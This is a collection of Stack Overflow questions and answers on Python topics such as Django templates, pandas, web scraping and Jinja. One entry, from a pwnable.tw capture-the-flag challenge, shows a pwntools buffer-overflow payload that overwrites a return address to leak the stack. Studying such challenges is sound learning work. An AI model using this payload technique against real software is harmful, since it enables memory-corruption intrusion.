{% for v in values[0] %} <td>{{v}}</td> {% endfor %} </tr> {% endfor %} </table> Am pretty sure you can extend this logic to your specific dict. To iterate over dict keys in a sorted order - First we sort in python then iterate & render in django template. return render_to_response('some_page.html', {'data': sorted(data.items())}) In template file: {% for key, value in data %} <tr> <td> Key: {{ key }} </td> <td> Value: {{ value }} </td> </tr> {% endfor %} A: This answer didn't work for me, but I found the answer myself. No one, however, has posted my question. I'm too lazy to ask it and then answer it, so will just put it here. This is for the following query: data = Leaderboard.objects.filter(id=custom_user.id).values( 'value1', 'value2', 'value3') In template: {% for dictionary in data %} {% for key, value in dictionary.items %} <p>{{ key }} : {{ value }}</p> {% endfor %} {% endfor %} A: If you pass a variable data (dictionary type) as context to a template, then you code should be: {% for key, value in data.items %} <p>{{ key }} : {{ value }}</p> {% endfor %} A: I am thankful for the above answers pointing me in the right direction. From them I made an example for myself to understand it better. I am hoping this example will help you see the double dictionary action more easily and also help when you have more complex data structures. In the views.py: bigd = {} bigd['home'] = {'a': [1, 2] , 'b': [3, 4] ,'c': [5,6] } bigd['work'] = {'e': [1, 2] , 'd': [3, 4] ,'f': [5,6] } context['bigd'] = bigd In the template.html: {% for bigkey, bigvalue in bigd.items %} <b>{{ bigkey }}</b> <br> {% for key, value in bigvalue.items %} key:{{ key }} <br> ----values: {{ value.0}}, {{value.1 }}<br> {% endfor %} <br> {% endfor %} Notice the list in the second dictionary is accessed by the index in the list. Result in browser is something like:
how to iterate through dictionary in a dictionary in django template?
My dictionary looks like this(Dictionary within a dictionary): {'0': { 'chosen_unit': <Unit: Kg>, 'cost': Decimal('10.0000'), 'unit__name_abbrev': u'G', 'supplier__supplier': u"Steve's Meat Locker", 'price': Decimal('5.00'), 'supplier__address': u'No\r\naddress here', 'chosen_unit_amount': u'2', 'city__name': u'Joburg, Central', 'supplier__phone_number': u'02299944444', 'supplier__website': None, 'supplier__price_list': u'', 'supplier__email': u'ss.sss@ssssss.com', 'unit__name': u'Gram', 'name': u'Rump Bone', }} Now I'm just trying to display the information on my template but I'm struggling. My code for the template looks like: {% if landing_dict.ingredients %} <hr> {% for ingredient in landing_dict.ingredients %} {{ ingredient }} {% endfor %} <a href="/">Print {{ landing_dict.recipe_name }}</a> {% else %} Please search for an ingredient below {% endif %} It just shows me '0' on my template? I also tried: {% for ingredient in landing_dict.ingredients %} {{ ingredient.cost }} {% endfor %} This doesn't even display a result. I thought perhaps I need to iterate one level deeper so tried this: {% if landing_dict.ingredients %} <hr> {% for ingredient in landing_dict.ingredients %} {% for field in ingredient %} {{ field }} {% endfor %} {% endfor %} <a href="/">Print {{ landing_dict.recipe_name }}</a> {% else %} Please search for an ingredient below {% endif %} But this doesn't display anything. What am I doing wrong?
[ "Lets say your data is -\ndata = {'a': [ [1, 2] ], 'b': [ [3, 4] ],'c':[ [5,6]] }\nYou can use the data.items() method to get the dictionary elements. Note, in django templates we do NOT put (). Also some users mentioned values[0] does not work, if that is the case then try values.items.\n<table>\n <tr>\n <td>a</td>\n <td>b</td>\n <td>c</td>\n </tr>\n\n {% for key, values in data.items %}\n <tr>\n <td>{{key}}</td>\n {% for v in values[0] %}\n <td>{{v}}</td>\n {% endfor %}\n </tr>\n {% endfor %}\n</table>\n\nAm pretty sure you can extend this logic to your specific dict.\n\nTo iterate over dict keys in a sorted order - First we sort in python then iterate & render in django template.\nreturn render_to_response('some_page.html', {'data': sorted(data.items())})\nIn template file:\n{% for key, value in data %}\n <tr>\n <td> Key: {{ key }} </td> \n <td> Value: {{ value }} </td>\n </tr>\n{% endfor %}\n\n", "This answer didn't work for me, but I found the answer myself. No one, however, has posted my question. I'm too lazy to \nask it and then answer it, so will just put it here.\nThis is for the following query:\ndata = Leaderboard.objects.filter(id=custom_user.id).values(\n 'value1',\n 'value2',\n 'value3')\n\nIn template:\n{% for dictionary in data %}\n {% for key, value in dictionary.items %}\n <p>{{ key }} : {{ value }}</p>\n {% endfor %}\n{% endfor %}\n\n", "If you pass a variable data (dictionary type) as context to a template, then you code should be:\n{% for key, value in data.items %}\n <p>{{ key }} : {{ value }}</p> \n{% endfor %}\n\n", "I am thankful for the above answers pointing me in the right direction. From them I made an example for myself to understand it better. I am hoping this example will help you see the double dictionary action more easily and also help when you have more complex data structures.\nIn the views.py:\n bigd = {}\n bigd['home'] = {'a': [1, 2] , 'b': [3, 4] ,'c': [5,6] }\n bigd['work'] = {'e': [1, 2] , 'd': [3, 4] ,'f': [5,6] }\n context['bigd'] = bigd\n\nIn the template.html:\n{% for bigkey, bigvalue in bigd.items %}\n <b>{{ bigkey }}</b> <br>\n {% for key, value in bigvalue.items %}\n key:{{ key }} <br>\n ----values: {{ value.0}}, {{value.1 }}<br>\n {% endfor %}\n <br>\n{% endfor %}\n\nNotice the list in the second dictionary is accessed by the index in the list.\nResult in browser is something like:\n\n" ]
[ 326, 4, 2, 0 ]
[]
[]
[ "dictionary", "django", "django_templates", "python" ]
stackoverflow_0008018973_dictionary_django_django_templates_python.txt
Q: Bound label to Image From the mnist dataset example I know that the dataset look something like this (60000,28,28) and the labels are (60000,). When, I print the first three examples of Mnist dataset and I print the first three labels of those which are: The images and labels are bounded. I want to know how can I bound a folder with (1200 images) with size 64 and 64 with an excel with a column named "damage", with 5 different classes so I can train a neural network. Like image of a car door and damage is class 3. A: Here's a rough sketch of how you can approach this problem. Loading each image The first step is how you pre-process each image. You can use Python Imaging Library for this. Example: from PIL import Image def load_image(path): image = Image.open(path) # Images can be in one of several different modes. # Convert to single consistent mode. image = image.convert("RGB") image = image.resize((64, 64)) return image Optional step: cropping Cropping the images to focus on the feature you want the network to pay attention to can improve performance, but requires some work for each training example and for each inference. Loading all images I would load the images like this: import glob import pandas as pd image_search_path = "image_directory/*.png" def load_all_images(): images = [] for path in glob.glob(image_search_path): image = load_image(path) images.append({ 'path': path, 'img': image, }) return pd.DataFrame(images) Loading the labels I would use Pandas to load the labels. Suppose you have an excel file with the columns path and label, named labels.xlsx. labels = pd.read_excel("labels.xlsx") You then have the problem that the images that are loaded are probably not in the same order as your file full of labels. You can fix this by merging the two datasets. images = load_all_images() images_and_labels = images.merge(labels, on="path", validate="1:1") # check that no rows were dropped or added, say by a missing label assert len(images.index) == len(images_and_labels.index) assert len(labels.index) == len(images_and_labels.index) Converting images to numpy Next, you need to convert both the images and labels into a numpy dataframe. Example for images: import numpy as np images_processed = [] for image in images_and_labels['img'].tolist(): image = np.array(image) # Does the image have expected shape? assert image.shape == (64, 64, 3) images_process.append(image) images_numpy = np.array(images_processed) # Check that this has the expected shape. You'll need # to replace 1200 with the number of training examples. assert images_numpy.shape == (1200, 64, 64, 3) Converting labels to numpy Assuming you're setting up a classifier, like MNIST, you'll first want to decide on an ordering of categories, and map each element of that list of categories to its position within that ordering. The ordering of categories is arbitrary, but you'll want to be consistent about it. Example: categories = { 'damage high': 0, 'damage low': 1, 'damage none': 2, } categories_num = labels_and_images['label'].map(categories) # Are there any labels that didn't get mapped to something? assert categories_num.isna().sum() == 0 # Convert labels to numpy labels_np = categories_num.values # Check shape. You'll need to replace 1200 with the number of training examples assert labels_np.shape == (1200,) You should now have the variables images_np and labels_np set up as numpy arrays in the same style as the MNIST example.
Bound label to Image
From the mnist dataset example I know that the dataset look something like this (60000,28,28) and the labels are (60000,). When, I print the first three examples of Mnist dataset and I print the first three labels of those which are: The images and labels are bounded. I want to know how can I bound a folder with (1200 images) with size 64 and 64 with an excel with a column named "damage", with 5 different classes so I can train a neural network. Like image of a car door and damage is class 3.
[ "Here's a rough sketch of how you can approach this problem.\nLoading each image\nThe first step is how you pre-process each image. You can use Python Imaging Library for this.\nExample:\nfrom PIL import Image\n\ndef load_image(path):\n image = Image.open(path)\n # Images can be in one of several different modes.\n # Convert to single consistent mode.\n image = image.convert(\"RGB\")\n image = image.resize((64, 64))\n return image\n\nOptional step: cropping\nCropping the images to focus on the feature you want the network to pay attention to can improve performance, but requires some work for each training example and for each inference.\nLoading all images\nI would load the images like this:\nimport glob\nimport pandas as pd\n\nimage_search_path = \"image_directory/*.png\"\n\ndef load_all_images():\n images = []\n for path in glob.glob(image_search_path):\n image = load_image(path)\n images.append({\n 'path': path,\n 'img': image,\n })\n return pd.DataFrame(images)\n\nLoading the labels\nI would use Pandas to load the labels. Suppose you have an excel file with the columns path and label, named labels.xlsx.\nlabels = pd.read_excel(\"labels.xlsx\")\n\nYou then have the problem that the images that are loaded are probably not in the same order as your file full of labels. You can fix this by merging the two datasets.\nimages = load_all_images()\nimages_and_labels = images.merge(labels, on=\"path\", validate=\"1:1\")\n# check that no rows were dropped or added, say by a missing label\nassert len(images.index) == len(images_and_labels.index)\nassert len(labels.index) == len(images_and_labels.index)\n\nConverting images to numpy\nNext, you need to convert both the images and labels into a numpy dataframe.\nExample for images:\nimport numpy as np\n\nimages_processed = []\nfor image in images_and_labels['img'].tolist():\n image = np.array(image)\n # Does the image have expected shape?\n assert image.shape == (64, 64, 3)\n images_process.append(image)\nimages_numpy = np.array(images_processed)\n# Check that this has the expected shape. You'll need\n# to replace 1200 with the number of training examples.\nassert images_numpy.shape == (1200, 64, 64, 3)\n\nConverting labels to numpy\nAssuming you're setting up a classifier, like MNIST, you'll first want to decide on an ordering of categories, and map each element of that list of categories to its position within that ordering.\nThe ordering of categories is arbitrary, but you'll want to be consistent about it.\nExample:\ncategories = {\n 'damage high': 0,\n 'damage low': 1,\n 'damage none': 2,\n}\n\ncategories_num = labels_and_images['label'].map(categories)\n# Are there any labels that didn't get mapped to something?\nassert categories_num.isna().sum() == 0\n# Convert labels to numpy\nlabels_np = categories_num.values\n# Check shape. You'll need to replace 1200 with the number of training examples\nassert labels_np.shape == (1200,)\n\nYou should now have the variables images_np and labels_np set up as numpy arrays in the same style as the MNIST example.\n" ]
[ 0 ]
[]
[]
[ "deep_learning", "mnist", "neural_network", "python" ]
stackoverflow_0074572024_deep_learning_mnist_neural_network_python.txt
Q: Cannot import settings module in python I'm trying to use settings module but is shows "ModuleNotFoundError: No module named 'settings'" and whien I try to install the module it shows "Requirement already satisfied: python-settings in c:\users\harsh\appdata\local\programs\python\python310\lib\site-packages (0.2.2)" import settings import settings module A: try pip install python-settings to import from python_settings import settings A: If you have Visual Studio, you can create a Python environment (just right-click on it, choose "add environment" and set your python version) in "solution explorer" and then right-click on your new Python environment and choose "Manage python packages...", there you can search and install what you need. If your IDE is not VS you can try to search same things there.
Cannot import settings module in python
I'm trying to use settings module but is shows "ModuleNotFoundError: No module named 'settings'" and whien I try to install the module it shows "Requirement already satisfied: python-settings in c:\users\harsh\appdata\local\programs\python\python310\lib\site-packages (0.2.2)" import settings import settings module
[ "try\npip install python-settings\nto import\nfrom python_settings import settings\n", "If you have Visual Studio, you can create a Python environment (just right-click on it, choose \"add environment\" and set your python version) in \"solution explorer\" and then right-click on your new Python environment and choose \"Manage python packages...\", there you can search and install what you need. If your IDE is not VS you can try to search same things there.\n" ]
[ 1, 0 ]
[]
[]
[ "python", "python_module" ]
stackoverflow_0074576312_python_python_module.txt
Q: How to scrape multiple tables with same name? I am trying to scrape a site where the table classes have the same name. There are 3 types of tables and I want to get the headers just once then get all the information from all three tables into a xlsx file. Website = https://wiki.warthunder.com/List_of_vehicle_battle_ratings running the code with vehical = soup.find('table') works. But I only get the first tables information. I've tried changing it into vehical = soup.find_all('table') But that gives me this error. AttributeError: ResultSet object has no attribute 'find_all'. You're probably treating a list of elements like a single element. Did you call find_all() when you meant to call find()? Here is my full code: import pandas as pd import numpy as np import requests from bs4 import BeautifulSoup def updatebr(): url='https://wiki.warthunder.com/List_of_vehicle_battle_ratings' headers =[] r = requests.get(url) soup = BeautifulSoup(r.text, 'html.parser') vehical = soup.find('table') for i in vehical.find_all('th'): title = i.text headers.append(title) df = pd.DataFrame(columns = headers) for row in vehical.find_all('tr')[1:]: data = row.find_all('td') row_data = [td.text for td in data] length = len(df) df.loc[length] = row_data df.to_excel('brlist.xlsx') Full Error Code: Traceback (most recent call last): File "c:\Python\WT\BRtest.py", line 35, in <module> updatebr() File "c:\Python\WT\BRtest.py", line 24, in updatebr test = vehical.find_all('tr') File "C:\lib\site-packages\bs4\element.py", line 2289, in __getattr__ raise AttributeError( AttributeError: ResultSet object has no attribute 'find_all'. You're probably treating a list of elements like a single element. Did you call find_all() when you meant to call find()? enter code here A: Make it more simple, since you already involve pandas - This wil pd.read_html() all tables in a list an pd.concat() them to a single one: pd.concat( pd.read_html( 'https://wiki.warthunder.com/List_of_vehicle_battle_ratings', attrs={'class':'wikitable'} ), ignore_index=True ).to_excel('brlist.xlsx') country type name ab rb sb 0 Italy Utility helicopter A.109EOA-2 8.7 9 9.3 1 Italy Attack helicopter A-129 International (p) 9.7 10 9.7 ... ... ... ... ... ... ... 1945 USSR Frigate Rosomacha 4 4 4 1946 USSR Motor gun boat Ya-5M 1.3 1.3 1.3 However to answer your question - Since using vehical = soup.find_all('table') you have to performe an additional loop iterating the ResultSet. Used stripped_strings here to simplify. ... url='https://wiki.warthunder.com/List_of_vehicle_battle_ratings' r = requests.get(url) soup = BeautifulSoup(r.text, 'html.parser') vehical = soup.select('table.wikitable') pd.DataFrame( [list(row.stripped_strings) for t in vehical for row in t.select('tr:has(td)') ], columns=list(soup.table.tr.stripped_strings) ).to_excel('brlist.xlsx')
How to scrape multiple tables with same name?
I am trying to scrape a site where the table classes have the same name. There are 3 types of tables and I want to get the headers just once then get all the information from all three tables into a xlsx file. Website = https://wiki.warthunder.com/List_of_vehicle_battle_ratings running the code with vehical = soup.find('table') works. But I only get the first tables information. I've tried changing it into vehical = soup.find_all('table') But that gives me this error. AttributeError: ResultSet object has no attribute 'find_all'. You're probably treating a list of elements like a single element. Did you call find_all() when you meant to call find()? Here is my full code: import pandas as pd import numpy as np import requests from bs4 import BeautifulSoup def updatebr(): url='https://wiki.warthunder.com/List_of_vehicle_battle_ratings' headers =[] r = requests.get(url) soup = BeautifulSoup(r.text, 'html.parser') vehical = soup.find('table') for i in vehical.find_all('th'): title = i.text headers.append(title) df = pd.DataFrame(columns = headers) for row in vehical.find_all('tr')[1:]: data = row.find_all('td') row_data = [td.text for td in data] length = len(df) df.loc[length] = row_data df.to_excel('brlist.xlsx') Full Error Code: Traceback (most recent call last): File "c:\Python\WT\BRtest.py", line 35, in <module> updatebr() File "c:\Python\WT\BRtest.py", line 24, in updatebr test = vehical.find_all('tr') File "C:\lib\site-packages\bs4\element.py", line 2289, in __getattr__ raise AttributeError( AttributeError: ResultSet object has no attribute 'find_all'. You're probably treating a list of elements like a single element. Did you call find_all() when you meant to call find()? enter code here
[ "Make it more simple, since you already involve pandas - This wil pd.read_html() all tables in a list an pd.concat() them to a single one:\npd.concat(\n pd.read_html(\n 'https://wiki.warthunder.com/List_of_vehicle_battle_ratings',\n attrs={'class':'wikitable'}\n ),\n ignore_index=True\n).to_excel('brlist.xlsx')\n\n\n\n\n\n\ncountry\ntype\nname\nab\nrb\nsb\n\n\n\n\n0\nItaly\nUtility helicopter\nA.109EOA-2\n8.7\n9\n9.3\n\n\n1\nItaly\nAttack helicopter\nA-129 International (p)\n9.7\n10\n9.7\n\n\n...\n...\n...\n...\n...\n...\n...\n\n\n1945\nUSSR\nFrigate\nRosomacha\n4\n4\n4\n\n\n1946\nUSSR\nMotor gun boat\nYa-5M\n1.3\n1.3\n1.3\n\n\n\n\nHowever to answer your question - Since using vehical = soup.find_all('table') you have to performe an additional loop iterating the ResultSet. Used stripped_strings here to simplify.\n...\nurl='https://wiki.warthunder.com/List_of_vehicle_battle_ratings'\nr = requests.get(url)\nsoup = BeautifulSoup(r.text, 'html.parser')\nvehical = soup.select('table.wikitable')\n\npd.DataFrame(\n [list(row.stripped_strings)\n for t in vehical \n for row in t.select('tr:has(td)')\n ],\n columns=list(soup.table.tr.stripped_strings)\n).to_excel('brlist.xlsx')\n\n" ]
[ 1 ]
[]
[]
[ "beautifulsoup", "dataframe", "pandas", "python", "web_scraping" ]
stackoverflow_0074576236_beautifulsoup_dataframe_pandas_python_web_scraping.txt
Q: Converting shellcode hex bytes to text based inputs in Python for an unknown byte value '\x87'? Not a UTF-8 string? So I am currently doing a beginner CTF challengeon pwnable.tw, the "start" challenge specifically. After reversing the challenge binary I found out there was a buffer overflow exploit, and one thing I would have to do to get an ideal starting point would be to leak the stack address by pointing it back to a specific address (0x08048087), so i crafted a payload, that would then overwrite the return address with the address I was aiming for. However, I'm having trouble converting the byte data into a string format to be fed to the vulnerable program. Below is my python code: from pwn import * shellcode = b'A' * 20 shellcode += pack(0x08048087, 32) print(shellcode) I use the pwn library to simplify packing the address, and then I print it and then pipe it into the vulnerable binary as stdin. However, what will happen when I print this, is that rather than printing the string equivalent of the associated hex values of that address, it will instead print this: b'AAAAAAAAAAAAAAAAAAAA\x87\x80\x04\x08' Just a string literal version of the hex values themselves. However, this will of course not be interpreted by the program in the way i intend it to be. So I try to decode it into utf-8 or an ASCII string, or even use str to convert it no matter which way I choose I get the following error: UnicodeDecodeError: 'utf-8' codec can't decode byte 0x87 in position 20: invalid start byte It would seem it can't decode the 0x87, which makes sense, in this case there does not seem to be an equivalent for it to decode to. But then my question becomes how can I deliver my shell code, specifically the hexadecimal address part, to the program in a way that the program will interpret that portion of the overflowed buffer as the address that i intend it to, rather than it being incorrectly mapped since my script gave me a stringified version of the hex values themselves? A: So I ended up finding the answer, it was to use sys.stdout.buffer.write(), rather than print or sys.stdout.write() since sys.stdout.buffer.write() uses a BufferedWriter which simply operates on raw bytes rather than the other two which operate on text/strings. Thank you to everyone in the comments who helped me!
Converting shellcode hex bytes to text based inputs in Python for an unknown byte value '\x87'? Not a UTF-8 string?
So I am currently doing a beginner CTF challengeon pwnable.tw, the "start" challenge specifically. After reversing the challenge binary I found out there was a buffer overflow exploit, and one thing I would have to do to get an ideal starting point would be to leak the stack address by pointing it back to a specific address (0x08048087), so i crafted a payload, that would then overwrite the return address with the address I was aiming for. However, I'm having trouble converting the byte data into a string format to be fed to the vulnerable program. Below is my python code: from pwn import * shellcode = b'A' * 20 shellcode += pack(0x08048087, 32) print(shellcode) I use the pwn library to simplify packing the address, and then I print it and then pipe it into the vulnerable binary as stdin. However, what will happen when I print this, is that rather than printing the string equivalent of the associated hex values of that address, it will instead print this: b'AAAAAAAAAAAAAAAAAAAA\x87\x80\x04\x08' Just a string literal version of the hex values themselves. However, this will of course not be interpreted by the program in the way i intend it to be. So I try to decode it into utf-8 or an ASCII string, or even use str to convert it no matter which way I choose I get the following error: UnicodeDecodeError: 'utf-8' codec can't decode byte 0x87 in position 20: invalid start byte It would seem it can't decode the 0x87, which makes sense, in this case there does not seem to be an equivalent for it to decode to. But then my question becomes how can I deliver my shell code, specifically the hexadecimal address part, to the program in a way that the program will interpret that portion of the overflowed buffer as the address that i intend it to, rather than it being incorrectly mapped since my script gave me a stringified version of the hex values themselves?
[ "So I ended up finding the answer, it was to use sys.stdout.buffer.write(), rather than print or sys.stdout.write() since sys.stdout.buffer.write() uses a BufferedWriter which simply operates on raw bytes rather than the other two which operate on text/strings. Thank you to everyone in the comments who helped me!\n" ]
[ 0 ]
[]
[]
[ "buffer_overflow", "exploit", "python", "shellcode", "x86" ]
stackoverflow_0074554479_buffer_overflow_exploit_python_shellcode_x86.txt
Q: How to read names in file upto specific character using Python Group Name: grp1 name1 name2 name3 =============== Group Name: grp2 NAME4 NAME5 NAME6 NAME7 =============== and so on.... mainfile.txt will have above content, here i need to create lists with group names and each list will have its content which is present up to "=========" symbol. For Eg: as per above file content i need to create two lists(which is grp1 and grp2) where my grp1 list will have its own "names" as a content, below for reference. grp1 = ['name1','name2',name3'] grp2 = ['NAME4','NAME5',NAME6', 'NAME7'] Can any one help me achieve this using python? Thanks in advance. A: You can iterate on your file line by line like and check if the content is equal to the separator. This would give you something like this: file = open("myfile.txt", "r+") line = file.readline() groups = [] while line: group = [] while line and line != "===============": group.append(line) line = file.readline() groups.append(group) line = file.readline() edit: I guess you should also add a condition to ignore blank lines and the one with the group name.
How to read names in file upto specific character using Python
Group Name: grp1 name1 name2 name3 =============== Group Name: grp2 NAME4 NAME5 NAME6 NAME7 =============== and so on.... mainfile.txt will have above content, here i need to create lists with group names and each list will have its content which is present up to "=========" symbol. For Eg: as per above file content i need to create two lists(which is grp1 and grp2) where my grp1 list will have its own "names" as a content, below for reference. grp1 = ['name1','name2',name3'] grp2 = ['NAME4','NAME5',NAME6', 'NAME7'] Can any one help me achieve this using python? Thanks in advance.
[ "You can iterate on your file line by line like and check if the content is equal to the separator. This would give you something like this:\nfile = open(\"myfile.txt\", \"r+\")\nline = file.readline()\ngroups = []\n\nwhile line:\n group = []\n while line and line != \"===============\":\n group.append(line)\n line = file.readline()\n groups.append(group)\n line = file.readline()\n\nedit: I guess you should also add a condition to ignore blank lines and the one with the group name.\n" ]
[ 0 ]
[]
[]
[ "python", "python_3.x" ]
stackoverflow_0074576454_python_python_3.x.txt
Q: jinja2.exceptions.TemplateSyntaxError: expected token ':', got '}' in html i'm trying to make an if into my code html with flask: {% if {{ role }} = 1 %} <div id="cabecera"> <header class="py-3 mb-4 border-bottom"> <div class="container d-flex flex-wrap justify-content-center"> <a href="/home" class="d-flex align-items-center mb-3 mb-lg-0 me-lg-auto text-dark text-decoration-none"> i send {{ role }} from the login but when i execute the code, it say this: enter image description here i'm trying to control the view with permissions, if role is 1 show a div but if is other number, show a diferent div. A: You don't need the {{ }} to refer to variables inside Jinja statements. See here. So provided you have passed a variable role to the template the following will work: {% if role == 1 %} <div id="cabecera"> etc... {% endif %} A: Try this: {% if role == 1 %} <div id="cabecera"> <header class="py-3 mb-4 border-bottom"> <div class="container d-flex flex-wrap justify-content-center"> <a href="/home" class="d-flex align-items-center mb-3 mb-lg-0 me-lg-auto text-dark text-decoration-none"> (...) {% endif %}
jinja2.exceptions.TemplateSyntaxError: expected token ':', got '}' in html
i'm trying to make an if into my code html with flask: {% if {{ role }} = 1 %} <div id="cabecera"> <header class="py-3 mb-4 border-bottom"> <div class="container d-flex flex-wrap justify-content-center"> <a href="/home" class="d-flex align-items-center mb-3 mb-lg-0 me-lg-auto text-dark text-decoration-none"> i send {{ role }} from the login but when i execute the code, it say this: enter image description here i'm trying to control the view with permissions, if role is 1 show a div but if is other number, show a diferent div.
[ "You don't need the {{ }} to refer to variables inside Jinja statements. See here.\nSo provided you have passed a variable role to the template the following will work:\n{% if role == 1 %}\n <div id=\"cabecera\">\n etc...\n{% endif %}\n\n", "Try this:\n{% if role == 1 %}\n <div id=\"cabecera\">\n <header class=\"py-3 mb-4 border-bottom\">\n <div class=\"container d-flex flex-wrap justify-content-center\">\n <a href=\"/home\" class=\"d-flex align-items-center mb-3 mb-lg-0 me-lg-auto text-dark text-decoration-none\">\n(...)\n{% endif %}\n\n" ]
[ 1, 0 ]
[]
[]
[ "css", "flask", "html", "mysql", "python" ]
stackoverflow_0074576569_css_flask_html_mysql_python.txt
Q: replacing a value from df1['colA'] with df2['ColB'] using a unique identifier? Hi I am trying to replace values in a df1 column A with values from df2 column B, by matching them with df2 column A. Basically if the string of row x in df1['a'] is equal to a string of row y in df2['a'] I want to replace the value of df1['a'] with df2['b']. I have tried a couple things but for some reason this isn't working properly. I also wants to replace values that aren't in df2['a'] with None. my sample data is: df1 = pd.DataFrame({'a': ['a','b','a','d','e','f','g', 'h', 'i'], 'b': ['alpha', 'alpha', 'alpha', 'beta', 'beta', 'charlie', 'charlie', "alpha", "beta"], 'c': ['elephant', "zebra",'elephant', "zebra",'elephant', "zebra",'elephant','elephant', "zebra"]}) df2 = pd.DataFrame({'a': ['a','b','c','d','e','f','g'], 'b': ['alpha', 'alpha', 'alpha', 'beta', 'beta', 'charlie', 'charlie'], 'c': ['elephant', "zebra",'elephant', "zebra",'elephant', "zebra",'elephant']}) df1['UID'] = df1['a']+ df1['b']+df1['c'] df2['UID'] = df2['a']+ df2['b']+df2['c'] df1['a'].loc[df1['UID'].isin(df2['UID'])] = df2['c'] animals = ['elephant','zebra'] df1.loc[~df1['a'].isin(animals), "a"] = "None" This works in my sample data but isn't working in my actual data set which is much larger. Any ideas on how to do something similar to this? A: I think the explanation is not quite correct. Based on your code attempt, I suspect that what you mean is: For each row i of df1 that matches (for all fields (a, b, c)) a row j of df2, then replace df1.loc[i, 'a'] by df2.loc[j, 'c']. If that is the correct interpretation of your question, then: First, it is safer to use a tuple of the row values as UID for the row, instead of the string concatenation: imagine a row '_', 'foo', 'bar' and another '_', 'fooba', 'r' -- they are most certainly distinct. The second advantage of tuple is that it works with other types, not just strings. Thus: df1['UID'] = df1[['a', 'b', 'c']].apply(tuple, axis=1) df2['UID'] = df2[['a', 'b', 'c']].apply(tuple, axis=1) Then, the expected result can be obtained by merging on UID: df = df1.assign( a=df1.merge( df2[['UID', 'c']], on='UID', how='left', suffixes=['', '_y'])['c_y'].fillna('None') ) >>> df a b c UID 0 elephant alpha elephant (a, alpha, elephant) 1 zebra alpha zebra (b, alpha, zebra) 2 elephant alpha elephant (a, alpha, elephant) 3 zebra beta zebra (d, beta, zebra) 4 elephant beta elephant (e, beta, elephant) 5 zebra charlie zebra (f, charlie, zebra) 6 elephant charlie elephant (g, charlie, elephant) 7 None alpha elephant (h, alpha, elephant) 8 None beta zebra (i, beta, zebra)
replacing a value from df1['colA'] with df2['ColB'] using a unique identifier?
Hi I am trying to replace values in a df1 column A with values from df2 column B, by matching them with df2 column A. Basically if the string of row x in df1['a'] is equal to a string of row y in df2['a'] I want to replace the value of df1['a'] with df2['b']. I have tried a couple things but for some reason this isn't working properly. I also wants to replace values that aren't in df2['a'] with None. my sample data is: df1 = pd.DataFrame({'a': ['a','b','a','d','e','f','g', 'h', 'i'], 'b': ['alpha', 'alpha', 'alpha', 'beta', 'beta', 'charlie', 'charlie', "alpha", "beta"], 'c': ['elephant', "zebra",'elephant', "zebra",'elephant', "zebra",'elephant','elephant', "zebra"]}) df2 = pd.DataFrame({'a': ['a','b','c','d','e','f','g'], 'b': ['alpha', 'alpha', 'alpha', 'beta', 'beta', 'charlie', 'charlie'], 'c': ['elephant', "zebra",'elephant', "zebra",'elephant', "zebra",'elephant']}) df1['UID'] = df1['a']+ df1['b']+df1['c'] df2['UID'] = df2['a']+ df2['b']+df2['c'] df1['a'].loc[df1['UID'].isin(df2['UID'])] = df2['c'] animals = ['elephant','zebra'] df1.loc[~df1['a'].isin(animals), "a"] = "None" This works in my sample data but isn't working in my actual data set which is much larger. Any ideas on how to do something similar to this?
[ "I think the explanation is not quite correct. Based on your code attempt, I suspect that what you mean is:\n\nFor each row i of df1 that matches (for all fields (a, b, c)) a row j of df2, then replace df1.loc[i, 'a'] by df2.loc[j, 'c'].\n\nIf that is the correct interpretation of your question, then:\nFirst, it is safer to use a tuple of the row values as UID for the row, instead of the string concatenation: imagine a row '_', 'foo', 'bar' and another '_', 'fooba', 'r' -- they are most certainly distinct. The second advantage of tuple is that it works with other types, not just strings. Thus:\ndf1['UID'] = df1[['a', 'b', 'c']].apply(tuple, axis=1)\ndf2['UID'] = df2[['a', 'b', 'c']].apply(tuple, axis=1)\n\nThen, the expected result can be obtained by merging on UID:\ndf = df1.assign(\n a=df1.merge(\n df2[['UID', 'c']], on='UID', how='left',\n suffixes=['', '_y'])['c_y'].fillna('None')\n)\n\n>>> df\n a b c UID\n0 elephant alpha elephant (a, alpha, elephant)\n1 zebra alpha zebra (b, alpha, zebra)\n2 elephant alpha elephant (a, alpha, elephant)\n3 zebra beta zebra (d, beta, zebra)\n4 elephant beta elephant (e, beta, elephant)\n5 zebra charlie zebra (f, charlie, zebra)\n6 elephant charlie elephant (g, charlie, elephant)\n7 None alpha elephant (h, alpha, elephant)\n8 None beta zebra (i, beta, zebra)\n\n" ]
[ 1 ]
[]
[]
[ "dataframe", "pandas", "python" ]
stackoverflow_0074575994_dataframe_pandas_python.txt
Q: I have a data frame with Few columns and want sum of rows of a specific column with +1 row Input DF: Column A Column B AA 24 BB 37 CC 59 Desired Output Dataframe: Column A Column B Result AA 24 24 BB 37 61 CC 59 120 What I want is result column should have 24 in first row, 24+37 in 2nd row ,24+37+59 in 3rd row and so on. Kindly help I am a beginner and was trying to solve this problem by using sum A: You can use pandas.Series.cumsum : df["Column C"]= df["Column B"].cumsum() # Output : print(df) ​ Column A Column B Column C 0 AA 24 24 1 BB 37 61 2 CC 59 120
I have a data frame with Few columns and want sum of rows of a specific column with +1 row
Input DF: Column A Column B AA 24 BB 37 CC 59 Desired Output Dataframe: Column A Column B Result AA 24 24 BB 37 61 CC 59 120 What I want is result column should have 24 in first row, 24+37 in 2nd row ,24+37+59 in 3rd row and so on. Kindly help I am a beginner and was trying to solve this problem by using sum
[ "You can use pandas.Series.cumsum :\ndf[\"Column C\"]= df[\"Column B\"].cumsum()\n\n# Output :\nprint(df)\n​\n Column A Column B Column C\n0 AA 24 24\n1 BB 37 61\n2 CC 59 120\n\n" ]
[ 0 ]
[]
[]
[ "dataframe", "pandas", "python", "row" ]
stackoverflow_0074576611_dataframe_pandas_python_row.txt
